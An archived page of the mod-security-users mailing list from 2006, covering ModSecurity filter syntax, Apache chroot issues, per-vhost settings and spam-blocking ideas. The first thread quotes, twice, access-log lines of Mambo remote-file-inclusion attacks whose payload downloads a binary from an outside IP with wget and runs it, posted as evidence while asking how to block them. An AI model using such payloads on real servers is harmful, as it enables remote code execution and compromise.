mod-security-users — General discussion about mod_security

Re: [mod-security-users] What best to do with php, xmlrpc, cvs, mambo, blog, drupal, wordpress injection attacks?

[Andras G. <an...@an...>]

Hi,

Just ban wget, fetch and other dl clients, suspicious name is URL-s and of course you should secure 
your PHP (safe_mode, disable_functions, open_basedir).

For xmlrpc you may filter on the post payload, i'm not familiar with that security flaw.

IMHO you should give them a 404 and nothing more. I think the a best defense is showing them that 
there's nothing to exploit. When too many of these actions come to your webserver you may DoS the 
system you're redirecting to and giving a new target as well.

You may write letters to the abuse addresses of the network admins, because these are zombie 
machines almost everytime. On my webserver i got them coming from 3000-5000 addresses, but they're 
referer spams. I redirect them to localhost (to their localhost) with mod_rewrite. :)

Computer users tend to be very ignorant about security flaws lately, so there's no much we can do, 
besides a 404. :(

Regards,
Andrej


Ral...@it... wrote:
> Hello,
> 
> I guess evil noise like that is mundane encounter to any WWW
> webserver admin
> and probably an unavoidable plague as is SPAM for SMTP relays.
> 
> Because I haven't administered a WWW servicing webserver yet
> I luckily have missed such filth so far.
> 
> Of course these requests aren't serviced by our webserver and
> mod_security dutifully
> sends them a 404,
> nevertheless they waste bandwidth, file system space for their
> logging and processing resources.
> 
> On the other hand I'am hesitant to drop those source IP addresses
> by my packet filter
> because I suspect them (if not spoofed) to originate from an
> ISP's dynamic IP pool,
> and thereby blocking the next unlucky decent guy who happens have
> temporarily assigned such
> an abused IP address.
> 
> So I would like to ask you seasoned webserver admins how best to
> handle these requests?
> 
> Do you simply drop them,
> or do you redirect them to sites e.g. such as
> http://www.gulli.com/ ,
> or some CERT blacklist etc.?
> 
> As for mod_security,
> what would a neat filter look like to counter or trick them?
> Is the setup of a honeypod that would draw attention from the
> webserver advisable,
> or is such in vain?
> 
> Here's an excerpt from our access_log of requests trying to wget
> and run some hostile code
> through our webserver.
> As these reappear on a regular basis
> I assume that some attack kits that generate them are in
> widespread use.
> 
> 
> 203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2
> .php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos
> Config_absolute_path=http://209.123.16
> .34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%2074
> 4%20gicumz;./gicumz;echo%20YYY;echo|  
> HTTP/1.1" 404 208
> 203.221.23.212 - - [23/Feb/2006:03:56:55 +0100] "GET
> /index.php?option=com_content&do_pdf=1&id=1index2.
> php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
> onfig_absolute_path=http://209.123.16.
> 34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744
> %20gicumz;./gicumz;echo%20YYY;echo|  H
> TTP/1.1" 404 207
> 203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET
> /mambo/index2.php?_REQUEST[option]=com_content&_RE
> QUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.1
> 6.34/cmd.gif?&cmd=cd%20/tmp;wget%20209
> .123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|
> HTTP/1.1" 404 214
> 203.221.23.212 - - [23/Feb/2006:03:56:58 +0100] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQU
> EST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.
> 34/cmd.gif?&cmd=cd%20/tmp;wget%20209.1
> 23.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|
> HTTP/1.1" 404 212
> 203.221.23.212 - - [23/Feb/2006:03:56:59 +0100] "GET
> /articles/mambo/index2.php?_REQUEST[option]=com_co
> ntent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://
> 209.123.16.34/cmd.gif?&cmd=cd%20/tmp;w
> get%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20Y
> YY;echo|  HTTP/1.1" 404 223
> 203.221.23.212 - - [23/Feb/2006:03:57:01 +0100] "GET
> /cvs/mambo/index2.php?_REQUEST[option]=com_content
> &_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.1
> 23.16.34/cmd.gif?&cmd=cd%20/tmp;wget%2
> 0209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;ec
> ho|  HTTP/1.1" 404 218
> 203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php
> HTTP/1.1" 403 212
> 203.221.23.212 - - [23/Feb/2006:03:57:03 +0100] "POST
> /blog/xmlrpc.php HTTP/1.1" 403 217
> 203.221.23.212 - - [23/Feb/2006:03:57:05 +0100] "POST
> /blog/xmlsrv/xmlrpc.php HTTP/1.1" 403 224
> 203.221.23.212 - - [23/Feb/2006:03:57:06 +0100] "POST
> /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 225
> 203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST
> /drupal/xmlrpc.php HTTP/1.1" 403 219
> 203.221.23.212 - - [23/Feb/2006:03:57:09 +0100] "POST
> /phpgroupware/xmlrpc.php HTTP/1.1" 403 225
> 203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST
> /wordpress/xmlrpc.php HTTP/1.1" 403 222
> 203.221.23.212 - - [23/Feb/2006:03:57:11 +0100] "POST /xmlrpc.php
> HTTP/1.1" 403 212
> 203.221.23.212 - - [23/Feb/2006:03:57:13 +0100] "POST
> /xmlrpc/xmlrpc.php HTTP/1.1" 403 219
> 203.221.23.212 - - [23/Feb/2006:03:57:14 +0100] "POST
> /xmlsrv/xmlrpc.php HTTP/1.1" 403 219
> 
> 
> 
> -------------------------------------------------------
> This SF.Net email is sponsored by xPML, a groundbreaking scripting language
> that extends applications into web and mobile media. Attend the live webcast
> and join the prime developer group breaking into this new coding territory!
> http://sel.as-us.falkag.net/sel?cmd=k&kid0944&bid$1720&dat1642
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> 

[mod-security-users] What best to do with php, xmlrpc, cvs, mambo, blog, drupal, wordpress injection attacks?

[<Ral...@it...>]

Hello,

I guess evil noise like that is mundane encounter to any WWW
webserver admin
and probably an unavoidable plague as is SPAM for SMTP relays.

Because I haven't administered a WWW servicing webserver yet
I luckily have missed such filth so far.

Of course these requests aren't serviced by our webserver and
mod_security dutifully
sends them a 404,
nevertheless they waste bandwidth, file system space for their
logging and processing resources.

On the other hand I'am hesitant to drop those source IP addresses
by my packet filter
because I suspect them (if not spoofed) to originate from an
ISP's dynamic IP pool,
and thereby blocking the next unlucky decent guy who happens have
temporarily assigned such
an abused IP address.

So I would like to ask you seasoned webserver admins how best to
handle these requests?

Do you simply drop them,
or do you redirect them to sites e.g. such as
http://www.gulli.com/ ,
or some CERT blacklist etc.?

As for mod_security,
what would a neat filter look like to counter or trick them?
Is the setup of a honeypod that would draw attention from the
webserver advisable,
or is such in vain?

Here's an excerpt from our access_log of requests trying to wget
and run some hostile code
through our webserver.
As these reappear on a regular basis
I assume that some attack kits that generate them are in
widespread use.


203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET
/index2.php?option=3Dcom_content&do_pdf=3D1&id=3D1index2
.php?_REQUEST[option]=3Dcom_content&_REQUEST[Itemid]=3D1&GLOBALS=3D&mos
Config_absolute_path=3Dhttp://209.123.16
.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.123.16.34/gicumz;chmod%2074
4%20gicumz;./gicumz;echo%20YYY;echo| =20
HTTP/1.1" 404 208
203.221.23.212 - - [23/Feb/2006:03:56:55 +0100] "GET
/index.php?option=3Dcom_content&do_pdf=3D1&id=3D1index2.
php?_REQUEST[option]=3Dcom_content&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosC
onfig_absolute_path=3Dhttp://209.123.16.
34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744
%20gicumz;./gicumz;echo%20YYY;echo|  H
TTP/1.1" 404 207
203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET
/mambo/index2.php?_REQUEST[option]=3Dcom_content&_RE
QUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.123.1
6.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209
.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|
HTTP/1.1" 404 214
203.221.23.212 - - [23/Feb/2006:03:56:58 +0100] "GET
/cvs/index2.php?_REQUEST[option]=3Dcom_content&_REQU
EST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.123.16.
34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.1
23.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|
HTTP/1.1" 404 212
203.221.23.212 - - [23/Feb/2006:03:56:59 +0100] "GET
/articles/mambo/index2.php?_REQUEST[option]=3Dcom_co
ntent&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://
209.123.16.34/cmd.gif?&cmd=3Dcd%20/tmp;w
get%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20Y
YY;echo|  HTTP/1.1" 404 223
203.221.23.212 - - [23/Feb/2006:03:57:01 +0100] "GET
/cvs/mambo/index2.php?_REQUEST[option]=3Dcom_content
&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.1
23.16.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%2
0209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;ec
ho|  HTTP/1.1" 404 218
203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php
HTTP/1.1" 403 212
203.221.23.212 - - [23/Feb/2006:03:57:03 +0100] "POST
/blog/xmlrpc.php HTTP/1.1" 403 217
203.221.23.212 - - [23/Feb/2006:03:57:05 +0100] "POST
/blog/xmlsrv/xmlrpc.php HTTP/1.1" 403 224
203.221.23.212 - - [23/Feb/2006:03:57:06 +0100] "POST
/blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 225
203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST
/drupal/xmlrpc.php HTTP/1.1" 403 219
203.221.23.212 - - [23/Feb/2006:03:57:09 +0100] "POST
/phpgroupware/xmlrpc.php HTTP/1.1" 403 225
203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST
/wordpress/xmlrpc.php HTTP/1.1" 403 222
203.221.23.212 - - [23/Feb/2006:03:57:11 +0100] "POST /xmlrpc.php
HTTP/1.1" 403 212
203.221.23.212 - - [23/Feb/2006:03:57:13 +0100] "POST
/xmlrpc/xmlrpc.php HTTP/1.1" 403 219
203.221.23.212 - - [23/Feb/2006:03:57:14 +0100] "POST
/xmlsrv/xmlrpc.php HTTP/1.1" 403 219

Re: [mod-security-users] Getting first SecSelectiveFilter to work

[Ivan R. <iv...@we...>]

Ral...@it... wrote:
>
> So I guess any valid request header field as named in section 5.3
> of RFC2616
> http://www.faqs.org/rfcs/rfc2616.html will be accepted by
> mod_security if prepended
> with "HTTP_", right ?

  Exactly!

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

RE: [mod-security-users] Getting first SecSelectiveFilter to work

[<Ral...@it...>]

>=20
>   BTW, let's go back to the users' list when we're discussing
>   ModSecurity.
>=20
>=20

Sorry for the detour,
so back to the list.


> > Oops, I have revisited the list of *all* LOCATIONS,
> > as it claims in the doc
> > (
> >
http://www.modsecurity.org/documentation/modsecurity-apache-manua
> > l-1.9.2.html#N103CE )
> > but I didn't discover HTTP_User-Agent therein.
> > Could you please refer me to a complete list
> > since guessing what are valid Location tokens is a bit
involved.
>=20
>   It is there, look at the end of the locations list. The
"User-Agent"
>   part it the name of the header. You can put any header name
there.


Sorry Ivan, but I still couldn't find it in the Location list.
Actually, the string agent only appears three times in the whole
of the single html
version of the doc.
And the first time it appears is in an audit log excerpt where
the actual HTTP Request
Header is cited.

http://www.modsecurity.org/documentation/modsecurity-apache-manua
l-1.9.2.html#N109C4


So I guess any valid request header field as named in section 5.3
of RFC2616
http://www.faqs.org/rfcs/rfc2616.html will be accepted by
mod_security if prepended
with "HTTP_", right ?


Actually, I was fooled by lwp-request (i.e. the LWP demo script
that comes with Perl's LWP module).
Though it according to its POD recognizes an -H switch that you
can supply any HTTP request header field
I made a little quoting mistake whereby it kept its default
User-Agent setting, which naturally was
lwp-request and would never match my filter.
I realized this when I reached line 383 in lwp-request in the
debugger where the -H supplied HTTP header
is dissected and if user-agent match supplied to the user_agent()
mutator method.

This of course could more easily be seen after I changed the log
format to Combined in httpd.conf
as it included referer and agent fields.

I also removed the Perlish clutter from my filter (e.g. match
delimeters)
so that it now read

# tail -4 ../../conf.d/security.conf=20

    SecFilterSelective HTTP_User-Agent
"^(tintin|snowy)-statuscheck$" log,deny,status:404

</IfModule>


(n.b. the trailing action is redundant as it is the default
filter action defined further above)


When I now run lwp-request again I can see my filter catchning
this


# tail -18 modsec_audit.log=20

=3D=3D51661f45=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Request: 123.123.123.123 123.123.123.123 - -
[23/Feb/2006:11:58:15 +0100] "GET /server-status?auto HTTP/1.1"
40
4 211 "-" "tintin-StatusCheck" - "-"
Handler: server-status
----------------------------------------
GET /server-status?auto HTTP/1.1
Connection: close
Host: 123.123.123.123
User-Agent: tintin-StatusCheck
mod_security-action: 404
mod_security-message: Access denied with code 404. Pattern match
"^(tintin|snowy)-statuscheck$" at HEADER("User-Agent")

HTTP/1.1 404 Not Found
Content-Length: 211
Connection: close
Content-Type: text/html; charset=3Diso-8859-1
--51661f45--


Many thanks for the immediate help Ivan!



>=20
>   How many web servers are there? Make sure to check out the
>   recently-announced ModSecurity Console
>   (http://www.thinkingstone.com/products/console/) - I'm sure
>   it would make your life much easier.


> > I also would have liked to chroot the webserver.
> > But again I'm plagued with third party closed source CGI
> > programmes that I must provide
> > on customer demand.
>=20
>   Yes, that's always a problem. So you need to support various
>   CGIs in addition to Tomcat? I guess the best thing you can
>   do is use suEXEC to run the CGIs.
>=20

> > If that alone wasn't bad enough they soon will coerce me into
> > placing some JSP or Java servlets
> > on the server, and I have no Java experience whatsoever.
>=20
>   You could be able to secure Java easily, because it comes
>   with MAC facilities built in. Try reading about the Security
>   Manager.
>=20

> > But I have no idea how to secure a Tomcat, let alone mod_jk.
>=20
>   At least you can run Tomcat on a high port as a non-root
user.

I for sure would never let a server run as root proc
(Apache is an exception as it initializes as root but
forks/threads all its client accept() children under User and
Group)
And afaik the Tomcat default Port is 8080, isn't it?
(but can be set in server.xml anyway)

[mod-security-users] Ideas for future features..

[Zach R. <ad...@li...>]

I know at least a few of us that use mod_security to enhance security in 
a shared webhosting environment have tried to tackle the problem of 
comment spam. The idea of using mod_security rules to block it isn't 
new. See gotroot.com's blacklist.conf for their attempt at it.

The problem is that the idea of using flatfiles for a blacklist cannot 
possibly be sustained indefinitely as more of this comment spam 
surfaces. Even blocking the robots by IPs will be nearly impossible 
using firewalls or flatfiles as even firewalls will start to slow down 
servers after tens of thousands of IPs are added.

The current solutions for blogs such as WordPress involve running a PHP 
script that accesses MySQL for each attempt and then blocking it based 
on certain criteria. While it works for now I would hate to see the day 
when this type of spam is as common as email spam getting ten attempts 
per second while attempting to run PHP and MySQL.

In my opinion what is needed is support for dnsbl type blacklists. 
Blar's mod_access_rbl was one attempt at this but, the results aren't 
cached so it isn't very efficient.

A rule such as..

SecFilterSelective "ARG_url" "^(http|https):/" 
lookup:combined.surbl.org,denyonfail

Even a way of mod_security extracting the domain from the arguement and 
then passing it to the surbl would be even better.

Another rule might be..

SecFilterSelective REMOTE_ADDR "regex_to_check_valid_ip" 
lookup:sbl-xbl.spamhaus.org,denyonfail

I think you can see where I'm going with this.

Zach

Re: [mod-security-users] Getting first SecSelectiveFilter to work

[Ivan R. <iv...@we...>]

Ral...@it... wrote:
>
> This was all very easy.
> However, now I even fail to get the most basic filter to work.
> Before I can establish any useful filters I need to convince
> myself
> that I understood their concept and syntax correctly.

  Hi,

  Two recommendations if you want to just play with it:

  1. Use "SecFilter REGEX" - SecFilter is very broad (it
     examines the request line and the body at the same
     time) but nice to play with regular expressions.

  2. Use the debug log and increase the log level (e.g.
     to 9) - then you'll be able to see exactly what
     ModSecurity does. This is usually not a good idea
     on a production server, though, because it logs
     a lot of stuff for every request.


> As a Perl fan I would assume that I have a basic knowledge of
> Perl's
> regex's, and the mod_security doc claims it to be PCRE capable.

  ModSecurity uses what Apache uses and if it's Apache 2.x
  then it's PCRE.


> SecFilterSelective HTTP_Header
> /agent:?\s*(?:hostA|hostB)-status/i log,pass

  Some observations:


  1) For the User-Agent header you want your rule to start
     with:

  SecFilterSelective HTTP_User-Agent ...

  2) You don't need / and /

  3) And you don't need i at the end, regexes are case
     insensitive.

  You'll find plenty of examples in the manual, BTW.


> I changed other directives such as e.g. SecServerSignature just
> to verify that 
> my tinkering gets recognized at all, and the latter one works if
> the ServerToken is reset to Full.
> Btw, it would be a nice feature if one could place an exec action
> next to SecServerSignature
> to sort of get "randomized" server signatures (e.g. day of week
> or similar)

  Noted.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

[mod-security-users] Getting first SecSelectiveFilter to work

[<Ral...@it...>]

Hello,

after having read about mod_security in O'Reilley's APACHE
SECURITY
I downloaded, installed and integrated the module into our
webserver.

This was all very easy.
However, now I even fail to get the most basic filter to work.
Before I can establish any useful filters I need to convince
myself
that I understood their concept and syntax correctly.

As a Perl fan I would assume that I have a basic knowledge of
Perl's
regex's, and the mod_security doc claims it to be PCRE capable.

For instance just to get started I loaded mod_status and collect
from the
/server-status?auto URI the scoreboard where I have a cronjob
counting the
various chars to be fed to Munin stats for its neat rrdgraph-ing.

This is done by a simple LWP request that has the HTTP header
modified to give
a User-Agent: token similar to "$(uname -n)-status"
Although that <Location> has an Allow from IP range restriction
it would further soothe paranoia if one could parse for an
allowed user agent
(admittedly, this wouldn't require mod_security I guess)

When I add a line like this to my mod_security.conf file=20
(n.b. Include-d in httpd.conf within a <IfDefined SEC> block)


SecFilterSelective HTTP_Header
/agent:?\s*(?:hostA|hostB)-status/i log,pass

and send the master httpd a SIGHUP (i.e. apachectl graceful,
which earlier started with -DSEC),
and then again run my server-status request nothing gets logged
as the filter doesn't seem to work.

I changed other directives such as e.g. SecServerSignature just
to verify that=20
my tinkering gets recognized at all, and the latter one works if
the ServerToken is reset to Full.
Btw, it would be a nice feature if one could place an exec action
next to SecServerSignature
to sort of get "randomized" server signatures (e.g. day of week
or similar)

Rgds
Ralph

Re: [mod-security-users] apache2 doesn't completely shutdown

[Ivan R. <iv...@we...>]

Steve McKinney wrote:
> I have searched the archives for this problem, but did not find anything
> with this particular problem.  I am running gentoo and have apache
> 2.0.55.  I have installed mod_security 1.87 (the latest version gentoo
> has working).  I can properly start apache (pid file shows up, 7
> processes are shown running with ps ax, and I can use links to connect
> to the server), and can almost shut it down...  When I run
> /etc/init.d/apache2 stop everything appears normal, but 2 apache
> processes are left running when I run ps ax.  Stopping the server does
> remove the pid file from the chroot jail as it should.

  Is this related to mod_security? E.g. are you chrooting Apache
  with it?

  Maybe you can try creating a folder such as

    /var/run/apache2/

  symlinked

  to

    /var/chroot/apache2/var/run/apache2/

  and change the PID location to

    /var/run/apache2/apache2.pid

  This would ensure the same PID file is used from inside
  and outside the jail.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

[mod-security-users] apache2 doesn't completely shutdown

[Steve M. <sj...@po...>]

I have searched the archives for this problem, but did not find anything 
with this particular problem.  I am running gentoo and have apache 
2.0.55.  I have installed mod_security 1.87 (the latest version gentoo 
has working).  I can properly start apache (pid file shows up, 7 
processes are shown running with ps ax, and I can use links to connect 
to the server), and can almost shut it down...  When I run 
/etc/init.d/apache2 stop everything appears normal, but 2 apache 
processes are left running when I run ps ax.  Stopping the server does 
remove the pid file from the chroot jail as it should.

The relevant settings are below:

------------------------
/etc/init.d/apache2
------------------------

CHROOT="/var/chroot/apache2"
PIDFILE="/var/run/apache2.pid"

stop() {
         checkconfig || return 1
         ebegin "Stopping apache2"
         ${APACHE2} ${APACHE2_OPTS} -c "PidFile $CHROOT$PIDFILE" -k stop
         eend $?
}

------------------------
/etc/conf.d/apache2
------------------------

PIDFILE=/var/chroot/apache2/var/run/apache2.pid

------------------------
/etc/apache2/httpd.conf
------------------------

PidFile "/var/run/apache2.pid"



Any ideas would be greatly appreciated.

Thanks,
Steve

Re: [mod-security-users] Activate Mod_security only in selected vhosts

[Ivan R. <iv...@we...>]

OXx wrote:
> Hello all,
> 
> I use Mod_security on a Debian Server with apache2.
> The mod works very well.
> My problem is I want to desactivate this mod_security on selected
> websites or activate only in some websites I choose.
> Is it possible via Vhosts or other methods?

  Yes. Any Apache container directive can introduce a
  different configuration or override the configuration
  of the parent container. .htaccess can work too.

  You should find the examples in the manual.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] SelectiveFilter doesn't seem to work with //

[Ivan R. <iv...@we...>]

PERA, Christophe (SOGETI TRANSICIEL) wrote:
> Hello,
> 
> Thanks for your previous answer.
> 
> I have an other question,
> 
> Where can i find the list of characters that they need
> to put one "\" before, when i try to declare them in rules?

  Apache 2.x uses the PCRE regex library. Its documentation
  is located at:

  http://www.pcre.org/pcre.txt

  Here's what it says on metacharacters:

--------------------
       There are two different sets of metacharacters: those that  are  recog-
       nized  anywhere in the pattern except within square brackets, and those
       that are recognized in square brackets. Outside  square  brackets,  the
       metacharacters are as follows:

         \      general escape character with several uses
         ^      assert start of string (or line, in multiline mode)
         $      assert end of string (or line, in multiline mode)
         .      match any character except newline (by default)
         [      start character class definition
         |      start of alternative branch
         (      start subpattern
         )      end subpattern
         ?      extends the meaning of (
                also 0 or 1 quantifier
                also quantifier minimizer
         *      0 or more quantifier
         +      1 or more quantifier
                also "possessive quantifier"
         {      start min/max quantifier

       Part  of  a  pattern  that is in square brackets is called a "character
       class". In a character class the only metacharacters are:

         \      general escape character
         ^      negate the class, but only if the first character
         -      indicates character range
         [      POSIX character class (only if followed by POSIX
                  syntax)
         ]      terminates the character class

       The following sections describe the use of each of the  metacharacters.
--------------------

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

RE: [mod-security-users] SelectiveFilter doesn't seem to work with //

[PERA, C. (S. TRANSICIEL) <chr...@ai...>]

Hello,

Thanks for your previous answer.

I have an other question,

Where can i find the list of characters that they need to put one "\" before, when i try to declare them in rules?
Example:
SecFilterSelective REQUEST_URI "/*" Deny
SecFilterSelective REQUEST_URI "./" Deny
SecFilterSelective REQUEST_URI "/." Deny
SecFilterSelective REQUEST_URI "<" Deny
etc.

I have seen in your documentation that i have to set "\./" instead of "./", but i don't find the information for the others.

Thanks a lot,

Christophe


-----Original Message-----
From: Ivan Ristic [mailto:iv...@we...]
Sent: 27 January 2006 18:59
To: PERA, Christophe
Cc: mod...@li...
Subject: Re: [mod-security-users] SelectiveFilter doesn't seem to work
with //




PERA, Christophe wrote:
> Hello,
>
> I try to implement the following rule but mod_sec doesn't match:
>
> SecFilterSelective REQUEST_URI "//" deny
>
> I don't understand because all other rules are well performed.
>
> Could you say me how to implement it?

  You can't, at least not yet. ModSecurity automatically compresses
  consecutive / characters into one - that's why yours does not
  match.

  FYI future releases are likely to allow you to configure
  exactly which normalisation methods to apply, and it will become
  possible to avoid the problem.

--

Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
Tel: +44 20 8141 2161, Fax: +44 87 0762 3934



This mail has originated outside your organization,
either from an external partner or the Global Internet.
Keep this in mind if you answer this message.



This e-mail is intended only for the above addressee. It may contain
privileged information. If you are not the addressee you must not copy,
distribute, disclose or use any of the information in it. If you have
received it in error please delete it and immediately notify the sender.
Security Notice: all e-mail, sent to or from this address, may be
accessed by someone other than the recipient, for system management and
security reasons. This access is controlled under Regulation of
Investigatory Powers Act 2000, Lawful Business Practises.

[mod-security-users] Activate Mod_security only in selected vhosts

[OXx <xxd...@gm...>]

Hello all,

I use Mod_security on a Debian Server with apache2.
The mod works very well.
My problem is I want to desactivate this mod_security on selected websites
or activate only in some websites I choose.
Is it possible via Vhosts or other methods?
Thanks
See ya
OXx

Re: [mod-security-users] Multipart: invalid Content-Disposition header (-11)?

[Ivan R. <iv...@we...>]

Ivan Ristic wrote:
> Gerwin Krist -|- Digitalus Webhosting wrote:
>> Hmmm well I dunno exactly whats this customer is using. I figured out
>> that customer is using Jupload (http://jupload.biz/) .
> 
> I think JUpload is wrong here, but I've contacted the developers
> to see if they are actually using that parameter for anything.

  I just heard from the JUpload developers. They are not using
  the header. They have also removed it from their application in
  their most recent build.


> I will also consider whether accepting unknown header parameters
> is dangerous or not. Maybe I can relax mod_security checks. ModSecurity
> is strict to reduce the possibility of someone exploiting impedance
> mismatch in parsing.

  I am still considering my options here. At the moment I am
  leaning toward introducing a bunch of options to allow for
  better control of the implicit checks. This would be nice to have
  if someone encounters a similar problem in the future.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

[mod-security-users] Re: Problems Upgrading from 1.8.7 to 1.9.2 with shtml

[Jeff T. <jt...@tc...>]

Ivan Ristic <ivanr <at> webkreator.com> writes:
> 
>   I've replicated the same problem using the virtual() function from
>   PHP. Perhaps you are not buffering output in your configuration?
> 
>   I've sent a fix to Jeff to try it out.
> 


The fix worked perfectly.  Many thanks to Ivan for his quick and completely 
successful fix.   In case anyone is experiencing this problem, this is the 
solution, straight from Ivan...

Replace:

  ap_add_output_filter_handle(global_sec_filter_out, NULL, r, r->connection);

with

  ap_add_output_filter_handle(global_sec_filter_out, msr->ctx_out, r, r-
>connection);
                                                     
in the mod_security.c file. 


Thanks again.

.jeff.

Re: [mod-security-users] filtering with no log

[David De M. <bio...@ya...>]

Hi Ivan,

Well as far I can see it is pretty much what I need. I
will do some tests. And well, I'll be reading the doc
carefully again ;-)

Thanks a lot!

Best regards,
David




--- Ivan Ristic <iv...@we...> a écrit :

> David De Maeyer wrote:
> > Hi all,
> > 
> > I have installed mod_security on one of our
> corporate
> > servers (mod_security: 1.9.2, apache: 2.0.55, OS:
> > FreeBSD 6, PHP: 5.1.2) and it works fine.
> > 
> > I first installed mod_security for its ability to
> log
> > POST requests. This works fine for me.
> > 
> > I was wondering if I could use it for filtering
> and
> > rejecting all the requests which are not
> > identified/addressed by/to a specific web
> application;
> > logging only the successful requests into
> access.log.
> > 
> > Say a client sends a POST request containing a
> > variable "origin" to a PHP script called
> "test.php"
> > served by the server on which mod_security is
> > installed and configured.
> 
>   How about this:
> 
>   # deny everything quietly
>   SecFilterSelective REMOTE_ADDR !^$
> deny,status:404,nolog
> 
>   # apply special rules to /test.php only
>   <Location /test.php>
>       # start with no rules
>       SecFilterInheritance Off
> 
>       # you did say "POST" only, right?
>       SecFilterSelective REQUEST_METHOD "^POST$"
> chain
>       # variable "origin" not empty
>       SecFilterSelective ARG_origin !^$
> allow,nolog,setenv:valid_request
> 
>       # deny everything else quietly
>       SecFilterSelective REMOTE_ADDR !^$
> deny,status:404,nolog
>   </Location>
> 
>   # Custom Apache log that logs only accepted
> requests
>   CustomLog logs/custom_access_log \
>   "%h %l %u %t \"%r\" %>s %b" \
>   env=valid_request
> 
> -- 
> Ivan Ristic, Technical Director
> Thinking Stone, http://www.thinkingstone.com
> ModSecurity: Open source Web Application Firewall
> 



	

	
		
___________________________________________________________________________ 
Nouveau : téléphonez moins cher avec Yahoo! Messenger ! Découvez les tarifs exceptionnels pour appeler la France et l'international.
Téléchargez sur http://fr.messenger.yahoo.com

Re: [mod-security-users] Apache 2.2

[Ivan R. <iv...@we...>]

apa...@gm... wrote:
> Is ModSecurity tested on Apache 2.2?

  Yes.

  (There were hardly any changes in 2.2 that impacted ModSecurity.)

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] Apache 2.2

[Ryan B. <rcb...@gm...>]

Yep, I installed/tested it last week-end.  Works great.

--
Ryan C. Barnett
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor: Securing Apache
GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache


On 2/16/06, apa...@gm... <apa...@gm...> wrote:
>
> Is ModSecurity tested on Apache 2.2?
>
>
> -------------------------------------------------------
> This SF.net email is sponsored by: Splunk Inc. Do you grep through log
> files
> for problems?  Stop!  Download the new AJAX search engine that makes
> searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
> http://sel.as-us.falkag.net/sel?cmd=3Dlnk&kid=3D103432&bid=3D230486&dat=
=3D121642
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
>

Re: [mod-security-users] Error processing request body: Multipart: invalid boundary encountered

[Ivan R. <iv...@we...>]

Sebastian Wiesinger wrote:
> Hi,
> 
> I'm getting the following error while a user is trying to edit a page
> in Typo3. Any suggestions where it comes from:

  Yes, the format of the multipart payload is invalid. I suspect
